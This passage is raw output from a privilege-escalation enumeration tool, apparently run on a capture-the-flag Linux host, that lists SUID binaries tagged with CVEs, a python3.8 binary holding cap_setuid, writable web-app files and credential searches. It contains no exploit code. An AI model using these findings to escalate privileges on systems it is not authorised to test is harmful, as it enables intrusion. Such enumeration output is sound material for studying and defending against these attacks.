UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem                                                                                                                                                           
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
19545PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket                                                                                                                               
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                                                                                                                                                                
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                                                                                                                              


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                                                        
tmux 3.0a                                                                                                                                                                                     


/tmp/tmux-1001



100  808k  100  808k    0     0  15674      0  0:00:52  0:00:52 --:--:-- 13378
                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                                                                            
                      ╚════════════════════════════════════╝                                                                                                                                  
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
-rwsr-xr-x 1 root root 39K Jul 21  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)                                                                                                             
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 55K Jul 21  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 21  2020 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 23K Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 128K Feb  2  2021 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 463K Mar  9  2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 109K Apr 24  2021 /snap/snapd/11841/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 109K Jun 15  2021 /snap/snapd/12398/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/2066/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/2066/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2066/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/2066/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/2066/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19  2021 /snap/core18/2066/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11  2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/2074/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/2074/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2074/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/2074/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/2074/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19  2021 /snap/core18/2074/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11  2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
-rwxr-sr-x 1 root shadow 83K May 28  2020 /usr/bin/chage                                                                                                                                      
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K May 28  2020 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root ssh 343K Mar  9  2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jul 21  2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 43K Apr  8  2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr  8  2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21  2020 /snap/core18/2066/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21  2020 /snap/core18/2066/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/2066/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/2066/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/2066/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /snap/core18/2066/usr/bin/wall
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /snap/core18/2074/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /snap/core18/2074/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/2074/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/2074/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/2074/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /snap/core18/2074/usr/bin/wall

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                                                                                                                       
files with acls in searched folders Not Found                                                                                                                                                 
                                                                                                                                                                                              
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                               
══╣ Current shell capabilities                                                                                                                                                                
CapInh:  0x0000000000000000=                                                                                                                                                                  
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=

╚ Parent process capabilities
CapInh:  0x0000000000000000=                                                                                                                                                                  
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                               
                                                                                                                                                                                              
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so                                                                                                                      
/etc/ld.so.conf                                                                                                                                                                               
Content of /etc/ld.so.conf:                                                                                                                                                                   
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf                                                                                                                                            
  - /usr/lib/x86_64-linux-gnu/libfakeroot                                                                                                                                                     
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib                                                                                                                                                                            
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu                                                                                                                                                           
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/                                                                                                                                               
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files                                                                                                             
total 36                                                                                                                                                                                      
drwxr-xr-x  2 root root 4096 May 23  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--  1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--  1 root root  833 Feb  2  2021 apps-bin-path.sh
-rw-r--r--  1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--  1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--  1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--  1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                               
                                                                                                                                                                                              
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3222 Mar 11  2020 sbin.dhclient                                                                                                                                       
-rw-r--r-- 1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 26703 Feb  2  2021 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1385 Dec  7  2019 usr.sbin.tcpdump

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                                                                                                                                  
═╣ Credentials in fstab/mtab? ........... No                                                                                                                                                  
═╣ Can I read shadow files? ............. No                                                                                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                                                                                  
═╣ Can I read root folder? .............. No                                                                                                                                                  
                                                                                                                                                                                              
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                                                                        
/home/nathan/.bash_history
/home/nathan/.viminfo
/root/
/var/www
/var/www/html/templates
/var/www/html/templates/index.html
/var/www/html/upload
/var/www/html/upload/0.pcap
/var/www/html/static
/var/www/html/static/js
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
/var/www/html/static/js/maps.js
/var/www/html/static/css
/var/www/html/static/css/bootstrap.min.css
/var/www/html/static/css/typography.css
/var/www/html/static/css/default-css.css

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root    root    9935 May 15  2021 0.pcap                                                                                                                                         
-rw-r--r-- 1 root root 19985 May 20  2021 index.html
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:07 3.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:11 1.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:12 4.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:18 5.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:18 6.pcap
-rw-r--r-- 1 tcpdump tcpdump  360 Nov  7 07:18 7.pcap
-rw-r--r-- 1 tcpdump tcpdump 1234 Nov  7 04:44 2.pcap
drwxr-xr-x 2 root root 4096 May 23  2021 css
drwxr-xr-x 2 root root 4096 May 23  2021 fonts
drwxr-xr-x 3 root root 4096 May 23  2021 js
drwxr-xr-x 9 root root 4096 May 23  2021 images
total 16
total 20
total 40

╔══════════╣ Readable files belonging to root and readable by me but not world readable
                                                                                                                                                                                              
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                             
/dev/mqueue                                                                                                                                                                                   
/dev/shm
/home/nathan
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core18/2066/tmp
/snap/core18/2066/var/tmp
/snap/core18/2074/tmp
/snap/core18/2074/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/tmp
/var/www/html
/var/www/html/__pycache__
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/app.py

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                             
                                                                                                                                                                                              


                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                                                                                                           
                            ╚═════════════════════════╝                                                                                                                                       
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                                    
/usr/bin/gettext.sh                                                                                                                                                                           
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2021-05-15+21:40:28.2491426570 /usr/local/bin/gunicorn                                                                                                                                        
2021-05-15+21:40:28.2011395020 /usr/local/bin/flask
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_terminal.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_keyboard.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in root
                                                                                                                                                                                              
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/nathan/.gnupg/pubring.kbx                                                                                                                                                               
/home/nathan/.gnupg/trustdb.gpg
/home/nathan/snap/lxd/common/config/config.yml
/var/log/syslog
/var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal
/var/log/journal/06774f23bd654b25a296a616308d2acd/system.journal
/var/log/kern.log
/var/log/auth.log

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation                                                                                                     
logrotate 3.14.0                                                                                                                                                                              

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/nathan (limit 20)
total 36                                                                                                                                                                                      
drwxr-xr-x 5 nathan nathan 4096 Nov  7 14:06 .
drwxr-xr-x 3 root   root   4096 May 23  2021 ..
lrwxrwxrwx 1 root   root      9 May 15  2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23  2021 .cache
drwx------ 3 nathan nathan 4096 Nov  7 14:06 .gnupg
-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 May 27  2021 .viminfo -> /dev/null
drwxr-xr-x 3 nathan nathan 4096 Nov  7 14:06 snap
-r-------- 1 nathan nathan   33 Nov  7 03:23 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/app.py                                                                                                                                                                          
/var/www/html/templates/index.html
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/upload/0.pcap
/var/www/html/upload/1.pcap
/var/www/html/upload/2.pcap
/var/www/html/upload/5.pcap
/var/www/html/upload/7.pcap
/var/www/html/upload/3.pcap
/var/www/html/upload/6.pcap
/var/www/html/upload/4.pcap
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js

╔══════════╣ Searching installed mail applications
                                                                                                                                                                                              
╔══════════╣ Mails (limit 50)
                                                                                                                                                                                              
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 3 Apr 24  2018 /snap/core18/2066/var/backups                                                                                                                           
total 0

drwxr-xr-x 2 root root 3 Apr 24  2018 /snap/core18/2074/var/backups
total 0

drwxr-xr-x 2 root root 4096 Nov  7 06:25 /var/backups
total 880
-rw-r--r-- 1 root root  51200 Nov  7 06:25 alternatives.tar.0
-rw-r--r-- 1 root root   2564 May 23  2021 alternatives.tar.1.gz
-rw-r--r-- 1 root root  34170 Jul 23  2021 apt.extended_states.0
-rw-r--r-- 1 root root   3854 May 23  2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root   3787 May 22  2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root   3760 May 21  2021 apt.extended_states.3.gz
-rw-r--r-- 1 root root   3949 May 15  2021 apt.extended_states.4.gz
-rw-r--r-- 1 root root   3694 Sep 23  2020 apt.extended_states.5.gz
-rw-r--r-- 1 root root    268 Sep 23  2020 dpkg.diversions.0
-rw-r--r-- 1 root root    139 Sep 23  2020 dpkg.diversions.1.gz
-rw-r--r-- 1 root root    135 May 15  2021 dpkg.statoverride.0
-rw-r--r-- 1 root root    142 May 15  2021 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 610976 Jul 23  2021 dpkg.status.0
-rw-r--r-- 1 root root 155045 May 22  2021 dpkg.status.1.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz                                                                                                                 
-rw-r--r-- 1 root root 11886 May 23  2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-80/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 0 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/.config.old
-rw-r--r-- 1 root root 0 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-73/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 1403 May 23  2021 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1775 Feb 25  2021 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 9833 Jul  9  2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jul  9  2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 Apr 14  2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Apr 14  2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 44048 Mar 17  2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 2743 Jul 31  2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 678 Nov  7 03:23 /run/blkid/blkid.tab.old

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001                                                                                     
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/www/html/static/images/icon/Thumbs.db: Composite Document File V2 Document, Cannot read section info
Found /var/www/html/static/images/icon/market-value/Thumbs.db: Composite Document File V2 Document, Cannot read section info

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)                                                                                                                  
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)                                                                                                                               
                                                                                                                                                                                              
╔══════════╣ Web files?(output limit)
/var/www/:                                                                                                                                                                                    
total 12K
drwxr-xr-x  3 root   root   4.0K May 23  2021 .
drwxr-xr-x 14 root   root   4.0K May 23  2021 ..
drwxr-xr-x  6 nathan nathan 4.0K May 25  2021 html

/var/www/html:
total 32K
drwxr-xr-x 6 nathan nathan 4.0K May 25  2021 .
drwxr-xr-x 3 root   root   4.0K May 23  2021 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 nathan nathan 220 Feb 25  2020 /home/nathan/.bash_logout                                                                                                                         
-rw-r--r-- 1 landscape landscape 0 Jul 31  2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Jul 31  2020 /etc/.pwd.lock
-rw------- 1 root root 0 Nov  7 03:23 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 0 Nov  7 03:23 /run/network/.ifstate.lock
-rw------- 1 root root 0 May  7  2021 /snap/core18/2066/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/2066/etc/skel/.bash_logout
-rw------- 1 root root 0 Jun 11  2021 /snap/core18/2074/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/2074/etc/skel/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 2564 May 23  2021 /var/backups/alternatives.tar.1.gz                                                                                                                   
-rw-r--r-- 1 root root 51200 Nov  7 06:25 /var/backups/alternatives.tar.0

╔══════════╣ Searching passwords in history files
                                                                                                                                                                                              
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                                                                                                                                    
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
